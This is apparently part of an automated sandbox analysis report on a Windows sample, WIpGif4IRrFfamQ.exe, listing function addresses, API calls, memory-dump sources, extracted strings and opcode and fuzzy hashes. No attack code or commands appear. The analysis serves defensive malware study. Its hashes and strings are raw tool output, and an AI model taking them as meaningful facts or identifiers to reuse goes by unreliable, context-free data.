Instruction Fuzzy Hash: 20113AB1D002498FDB24DFAAD4457EEFBF5EF88314F20881AD519A7240CB79A544CFA4

Function 0773594C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07739095

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 53667832f62a8d3268bedd5f0814427a1ba472dace884b3f1d3ead80c503a9b4
Instruction ID: ff6dc4f4886501ce22b1bbae9a5feda333f81d6fc0948001ab18bbab7c5b688d
Opcode Fuzzy Hash: 53667832f62a8d3268bedd5f0814427a1ba472dace884b3f1d3ead80c503a9b4
Instruction Fuzzy Hash: 1D1106B58007499FDB20DF99C584BDEFBF8EB48354F108859EA18A7201C379A954CFA1

Function 02ECAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02ECAFFE

Memory Dump Source

Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bb825541710ae181a6b728368c967ac898d8e2a7e4489c721823069e3e230d2f
Instruction ID: 9d061e05b28931a5c02260f52ec3ab6ce090078152413c1b9eb7ea41b7d42221
Opcode Fuzzy Hash: bb825541710ae181a6b728368c967ac898d8e2a7e4489c721823069e3e230d2f
Instruction Fuzzy Hash: 1C1102B5C006498FCB10DF9AD545A9EFBF4AB48228F10841AD529A7210C379A545CFA1

Function 07739030 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07739095

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b035ac24465a8df0ff716a391d7a3a8176ae0c5cf43d49d717797994e9d5bef9
Instruction ID: 01db2b8e87fff2a1320a1328143bdde291fa8a443c0a976191b4abf1fe00204b
Opcode Fuzzy Hash: b035ac24465a8df0ff716a391d7a3a8176ae0c5cf43d49d717797994e9d5bef9
Instruction Fuzzy Hash: 3C1103B59002499FDB10DF99D448BEEFFF4FB49314F20885AE558A7211C37AA544CFA1

Function 016FD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56a688f760e0cea233b3d94ac5cf17ca17bce7327255e33e629a54a8656d2a2c
Instruction ID: defe4688fdc8de57dcd0079d6834a897baddca8d0d00be531b8f3f50ccbdc8be
Opcode Fuzzy Hash: 56a688f760e0cea233b3d94ac5cf17ca17bce7327255e33e629a54a8656d2a2c
Instruction Fuzzy Hash: 722103B1504244DFDB05DF98D9C4F26BF65FB88318F20C56DEA090B356C33AE416CAA2

Function 016FD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e063666b94d78b4e38727bdcb80cdb81dcc9650c662588e9cb5a69a41f4e3f
Instruction ID: 0317c859562ce09877024a01aee7990bf4045d842fc0062abb9f7bdc214d1e85
Opcode Fuzzy Hash: 41e063666b94d78b4e38727bdcb80cdb81dcc9650c662588e9cb5a69a41f4e3f
Instruction Fuzzy Hash: 3021F471504204DFDB05DF58D9C0B56BF65FB98314F20C56DDA090B356C33AF456C6A2

Function 0170D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060603474.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170d000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7471379f96a05eac259228cbe3d56496196548471f8e584fae045689ea4acbf6
Instruction ID: b9cd527d0148d9f72e3553a7786ca7caa5a1edf222d36ce3c534fdbfcaed1068
Opcode Fuzzy Hash: 7471379f96a05eac259228cbe3d56496196548471f8e584fae045689ea4acbf6
Instruction Fuzzy Hash: 76210371604304DFDB26DFA8D984B16FFA5EB88314F20C5A9D90D4B296C33AD406CA61

Function 016FD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: f841d90a50202a8da0fb2abc0b1a4e6f776c7bc4269701c064e08595e4199d49
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 3611DF72404280CFCB02CF54D9C4B16BF71FB88314F24C6ADD9490B256C336E45ADBA2

Function 016FD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 100a1a4c7d7a3966619f0c4ad97c170592d76341cf954fda7bdc8cfcc82e80f1
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 6C11CD72404240DFDB02CF44D9C4B56BF61FB84224F24C6A9DA090A656C33AE45ACBA2

Function 0170D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060603474.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170d000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 235339f573d1290a891e73a7b7e18c12191520562383785395d3b611593a302c
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: C511BE75504380CFDB12CF54D5C4B15FFA1FB48314F24C6A9D8494B696C33AD40ACB62

Function 016FD731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff59e75a56342521fe32349874b31da6dbdecc3d30e8e99fa0b1ce25faa48ec9
Instruction ID: aada200ddb45586245030930a94bfca34f59adc211e22121bfbd29b458ae3cb6
Opcode Fuzzy Hash: ff59e75a56342521fe32349874b31da6dbdecc3d30e8e99fa0b1ce25faa48ec9
Instruction Fuzzy Hash: D701DB710043849AE7209AA9CD84B77FF9CEF45324F18C52DEF094E297C379A841C671

Function 016FD730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1cf20685792a69dad9e96cf901e9a7739097edd45b7a76c119d667d2597eba
Instruction ID: e7b0987cc9923bb27f75b995c448aababf68da4751f0ca462ce7d4dfcba893d7
Opcode Fuzzy Hash: 2e1cf20685792a69dad9e96cf901e9a7739097edd45b7a76c119d667d2597eba
Instruction Fuzzy Hash: 57F062724043849EE7218A1ACD84B66FF98EF85734F18C55AEE484E296C379A844CA71

Non-executed Functions

Function 07731D40 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd36b5f54927a886949c1c1de4ffcebc3f70febf7503e6e733f6b0bea7f7139
Instruction ID: 2fdab3f95e4dd8d4bebf50bb5732a1ca15df5e5f5fb2cc655ac2cc0059b21141
Opcode Fuzzy Hash: 3bd36b5f54927a886949c1c1de4ffcebc3f70febf7503e6e733f6b0bea7f7139
Instruction Fuzzy Hash: 7DE118B4E001198FCB14DFA8C5809AEFBB2FF89345F248169E419AB356D735AD42CF61

Function 077325B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecdeea52b6fb23021db390baba98f9d3dd477164b8541d97c28789ae9fb56686
Instruction ID: 8406d02550aa5deffe9bc282353381d22a5f319942409a625850633e34de39a7
Opcode Fuzzy Hash: ecdeea52b6fb23021db390baba98f9d3dd477164b8541d97c28789ae9fb56686
Instruction Fuzzy Hash: FEE106B4E002598FCB14DFA8C5809AEBBB2FF89345F248169D419AB356D734AD42CF61

Function 07733C58 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76b00779892a9de601228b228e058cb8086058fe70c66fa8b5dbe70b49b01ecf
Instruction ID: 53fa3867373b8639820d8746f910c6a167e29ed248fdeddc5f4b42b5c8869c01
Opcode Fuzzy Hash: 76b00779892a9de601228b228e058cb8086058fe70c66fa8b5dbe70b49b01ecf
Instruction Fuzzy Hash: CCE149B4E001598FCB14DFA8C5809AEFBB2FF89341F248169E419AB356D735AD41CF61

Function 07732178 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b104dd509efcc5bbefcfe58856af32796814205174751d27b72d79b65f07737c
Instruction ID: d8a46e1c39b2c1f506cb40ed6b8905954089de24709d5f3e752e4009de61767a
Opcode Fuzzy Hash: b104dd509efcc5bbefcfe58856af32796814205174751d27b72d79b65f07737c
Instruction Fuzzy Hash: 4BE117B4E001598FCB14DFA8C5809AEFBB2FF89345F248169E419AB356D734AD41CFA1

Function 07731908 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b35a6c875f29d09c856cb266d5492569560734b4f1721aecbd696bc6315c34
Instruction ID: 0405d12f65854f351695b7a031c8b38e1e407a5256a10bc52156b6e35717336b
Opcode Fuzzy Hash: 09b35a6c875f29d09c856cb266d5492569560734b4f1721aecbd696bc6315c34
Instruction Fuzzy Hash: 15E139B4E006598FCB14DFA8C5809AEFBB2FF89345F248169D418AB356D734AD41CF61

Function 02ECD5BC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5eab83622d0ca921dc6c08ceb05aa9e1e1b2ea08312be92544394d4e987e631
Instruction ID: e27fd71ba519c6a404ad44c89c42b1cb95964ad54f19f2d57f272ef09d2427d9
Opcode Fuzzy Hash: d5eab83622d0ca921dc6c08ceb05aa9e1e1b2ea08312be92544394d4e987e631
Instruction Fuzzy Hash: D3A17A32E402098FCF09DFA4C94459EB7B3FF85304B25956EE805AB265DB31E916CB90

Function 07732168 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39a48eb11d47cab6a3cc03577cc72fdf17eccd77858c0ab5f4d0824306637c05
Instruction ID: 22250176cdaccb7d06424e8556743a430e75f1cbb57e4b7cf516202e4ee93860
Opcode Fuzzy Hash: 39a48eb11d47cab6a3cc03577cc72fdf17eccd77858c0ab5f4d0824306637c05
Instruction Fuzzy Hash: 7A510BB4E002198FCB14DFA9C9409AEBBB2FF89345F24C16AD418A7256D735AD41CFA1

Analysis Process: WIpGif4IRrFfamQ.exePID: 7308, Parent PID: 6600COMMON

Execution Graph

Execution Coverage:	19.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	13.3%
Total number of Nodes:	30
Total number of Limit Nodes:	6

Executed Functions

Function 013F29E0 Relevance: 8.3, Strings: 6, Instructions: 846
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xaq, xrefs: 013F2AD8
Xaq, xrefs: 013F3CF6
Xaq, xrefs: 013F3CCD
Xaq, xrefs: 013F2A9E
Xaq, xrefs: 013F2BA4
Xaq, xrefs: 013F2B57

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
API String ID: 0-499371476
Opcode ID: 19e138bf3ba95881f18164d925378ecd481506c31d5b7cfe283dbe16232c69f1
Instruction ID: 349418ebdfd3314959f477baa965ca18c714fc53ab59baf08bc62d26cf12578e
Opcode Fuzzy Hash: 19e138bf3ba95881f18164d925378ecd481506c31d5b7cfe283dbe16232c69f1
Instruction Fuzzy Hash: CB52C032D04757CBC7B5CF38C9D629BBFB1BF41224B58889ED88686606E334AC11DB52

Function 013FC468 Relevance: 7.7, Strings: 6, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ljdp, xrefs: 013FC65D
Akq, xrefs: 013FC450
0odp, xrefs: 013FC4DA
Ljdp, xrefs: 013FC647
PH]q, xrefs: 013FC6BF
PH]q, xrefs: 013FC6D0

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: 0odp$Akq$Ljdp$Ljdp$PH]q$PH]q
API String ID: 0-3107611379
Opcode ID: ee8cfd1bbd7f0f2fda1a416497856d9651fd78aa531195901dbaa6c44fc4138a
Instruction ID: 94122de0f0e2095e49a9b8e131300e6c295b4986228b2790938bf91144f0a4ca
Opcode Fuzzy Hash: ee8cfd1bbd7f0f2fda1a416497856d9651fd78aa531195901dbaa6c44fc4138a
Instruction Fuzzy Hash: B481D374E00218CFDB18DFAAD984A9DBBF2BF88314F14D069E519AB365DB309945CF50

Function 013F6FC8 Relevance: 6.8, Strings: 5, Instructions: 519
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,aq, xrefs: 013F7298
(o]q, xrefs: 013F753D
(o]q, xrefs: 013F7212
(o]q, xrefs: 013F7220
,aq, xrefs: 013F728A

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-615190528
Opcode ID: e46ada1aeb63304489b6997b70ea1106b2e501038747313acffb16b3d2ccf9c7
Instruction ID: faf035c62258e1aa06455059b517b5fd8d2dd307a7762a0768563b698e82ac0b
Opcode Fuzzy Hash: e46ada1aeb63304489b6997b70ea1106b2e501038747313acffb16b3d2ccf9c7
Instruction Fuzzy Hash: 17222A30A00259DFDB15CF69C888AADBBF6FF88318F55846AEA05EB265D734DC41CB50

Function 013FC146 Relevance: 6.5, Strings: 5, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0odp, xrefs: 013FC20A
Ljdp, xrefs: 013FC377
PH]q, xrefs: 013FC3EF
PH]q, xrefs: 013FC400
Ljdp, xrefs: 013FC38D

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
API String ID: 0-3689317755
Opcode ID: ddd55c84eb4e8a323ba42e2c43644dbff70fc63c199390bfda8bcf7e4fcdf0ea
Instruction ID: f09cc57802f5d9b8a026258c1c7b86c0b2e9158f08c8c9d83dccef9ee06252f9
Opcode Fuzzy Hash: ddd55c84eb4e8a323ba42e2c43644dbff70fc63c199390bfda8bcf7e4fcdf0ea
Instruction Fuzzy Hash: A3A10474E40218CFDB18DFAAD984A9DBBF2FF89304F14906AE508AB365DB349941CF50

Function 013F5362 Relevance: 6.4, Strings: 5, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 013F55C8
PH]q, xrefs: 013F55D9
Ljdp, xrefs: 013F5566
0odp, xrefs: 013F53E2
Ljdp, xrefs: 013F5550

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
API String ID: 0-3689317755
Opcode ID: 2ede261a0e27dbcbd29660cbf193488bf04c47b9b1afbeec5d49865ee1dbfdfb
Instruction ID: 2c54182c18dbe98668d03fd87effd73be2c3bb7bdbedd4164b94e32517c5c935
Opcode Fuzzy Hash: 2ede261a0e27dbcbd29660cbf193488bf04c47b9b1afbeec5d49865ee1dbfdfb
Instruction Fuzzy Hash: 0991D474E00218CFDB18CFAAD984A9DBBF2BF89304F15C069E509AB365DB349985CF50

Function 013FCD28 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 013FCF7F
PH]q, xrefs: 013FCF90
Ljdp, xrefs: 013FCF1D
0odp, xrefs: 013FCD9A
Ljdp, xrefs: 013FCF07

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
API String ID: 0-3689317755
Opcode ID: ec68249d6f23a9d48f42b1e6d5b2cbe53124506d36cc293180b5943929aa3995
Instruction ID: b8e84132140f32a40b6a21aba7ab627702a78f1acd8738a9890a23cf11b3849f
Opcode Fuzzy Hash: ec68249d6f23a9d48f42b1e6d5b2cbe53124506d36cc293180b5943929aa3995
Instruction Fuzzy Hash: E281B474E00218CFDB18DFAAD994A9DFBF2BF88314F149069E518AB365DB309985CF50

Function 013FCFF7 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 013FD24F
0odp, xrefs: 013FD06A
PH]q, xrefs: 013FD260
Ljdp, xrefs: 013FD1D7
Ljdp, xrefs: 013FD1ED

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
API String ID: 0-3689317755
Opcode ID: 3149e8ac604987521e85d21d77fc0fc04677c249847392e414dc99d85bea4ffc
Instruction ID: 6608630ed086edb4eeb7b627ad1d58dddc9675244b1525975b83c77f2dca2c8b
Opcode Fuzzy Hash: 3149e8ac604987521e85d21d77fc0fc04677c249847392e414dc99d85bea4ffc
Instruction Fuzzy Hash: AF81D574E00218CFDB58DFAAD884A9DBBF2BF88314F14C169E918AB365DB309945CF50

Function 013FD2C8 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ljdp, xrefs: 013FD4BD
0odp, xrefs: 013FD33A
PH]q, xrefs: 013FD530
PH]q, xrefs: 013FD51F
Ljdp, xrefs: 013FD4A7

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
API String ID: 0-3689317755
Opcode ID: 960c3097d902add054ce6f92ce7ff6c4a5f43d487c8903edf29448921225e72a
Instruction ID: 371bd88e086920ffb110ef5759f3643530d2bac54f1cdd9a1cccc655c10768b6
Opcode Fuzzy Hash: 960c3097d902add054ce6f92ce7ff6c4a5f43d487c8903edf29448921225e72a
Instruction Fuzzy Hash: 5F81C474E00218CFDB18DFAAD984A9DBBF2BF89304F14C069E518AB365DB349985CF10

Function 013FD599 Relevance: 6.4, Strings: 5, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 013FD7EF
PH]q, xrefs: 013FD800
Ljdp, xrefs: 013FD78D
0odp, xrefs: 013FD60A
Ljdp, xrefs: 013FD777

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
API String ID: 0-3689317755
Opcode ID: 27efd50ffeae33fc796a744fc1e9c46c342bd9a461d00ccf6d2fe79716df0ba4
Instruction ID: eba4b2165bd2bec06af784b93ca8b9a76fbad694a3fe6fd61c9a8ca85d2a958c
Opcode Fuzzy Hash: 27efd50ffeae33fc796a744fc1e9c46c342bd9a461d00ccf6d2fe79716df0ba4
Instruction Fuzzy Hash: 9F81C274E00258CFDB18DFAAD984A9DBBF2BF88314F14C169E519AB365DB309985CF10

Function 013FC738 Relevance: 6.4, Strings: 5, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0odp, xrefs: 013FC7AA
PH]q, xrefs: 013FC9A0
Ljdp, xrefs: 013FC917
PH]q, xrefs: 013FC98F
Ljdp, xrefs: 013FC92D

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
API String ID: 0-3689317755
Opcode ID: 59e54412146b62b3035c168bd12809cae9297c544ae0f3bd1b065e2c6a73001e
Instruction ID: c686bc906a1c4e53a4c1ae70d1414faf3db00ddb916726ca200df196deb67a88
Opcode Fuzzy Hash: 59e54412146b62b3035c168bd12809cae9297c544ae0f3bd1b065e2c6a73001e
Instruction Fuzzy Hash: CE81B374E00218CFDB18DFAAD984A9DBBF2BF88314F14D069E518AB365DB309945CF50

Function 013F9DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

(o]q, xrefs: 013FA518
4']q, xrefs: 013FAB13
4']q, xrefs: 013F9F0C
4']q, xrefs: 013F9E04

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: (o]q$4']q$4']q$4']q
API String ID: 0-875651895
Opcode ID: cdb74a88f23c8d1d9af5ba087cf4cd789a3ee0a52acb267d485894920047c9da
Instruction ID: fa02b6b40eb6891354cb65a9b1d68f3d91334a385263c3f99780c3d54125fd0d
Opcode Fuzzy Hash: cdb74a88f23c8d1d9af5ba087cf4cd789a3ee0a52acb267d485894920047c9da
Instruction Fuzzy Hash: 99A29F34A00209CFDB15CFA8C984AAEBBF6FF88314F158569E609DB366D734E845CB51

Function 013F69A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

(o]q, xrefs: 013F6EDA
Haq, xrefs: 013F6DA6

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: (o]q$Haq
API String ID: 0-903699183
Opcode ID: a3d341c36392acf712b7527a8846411bebc799d952ff3b5374280bfc5ddac547
Instruction ID: cd6502847ade14a296419dda13aedc761cad22d836c8004e02898d173329023f
Opcode Fuzzy Hash: a3d341c36392acf712b7527a8846411bebc799d952ff3b5374280bfc5ddac547
Instruction Fuzzy Hash: FE127DB0A0021A8FDB15DF69C854AAEBBF6FF88304F108559E945DB395DF309D46CB90

Function 013F3E09 Relevance: 2.9, Strings: 2, Instructions: 433
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 013F3E2E
Xaq, xrefs: 013F3E47

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: 615b9b44b9dfc9ffbce546b42ff9499c0cdddd08a3b25c030a332a8ef1629b7a
Instruction ID: ede41c51d02fbae80c795cb05beb381cd565203577a762846a50fc75e08de558
Opcode Fuzzy Hash: 615b9b44b9dfc9ffbce546b42ff9499c0cdddd08a3b25c030a332a8ef1629b7a
Instruction Fuzzy Hash: DFF16B74E0021ADFCB18DFB9D8945AEBBB6FF89310B14892DE506E7358CB359802CB51

Function 06B69590 Relevance: 2.0, APIs: 1, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4481536621.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_WIpGif4IRrFfamQ.jbxd

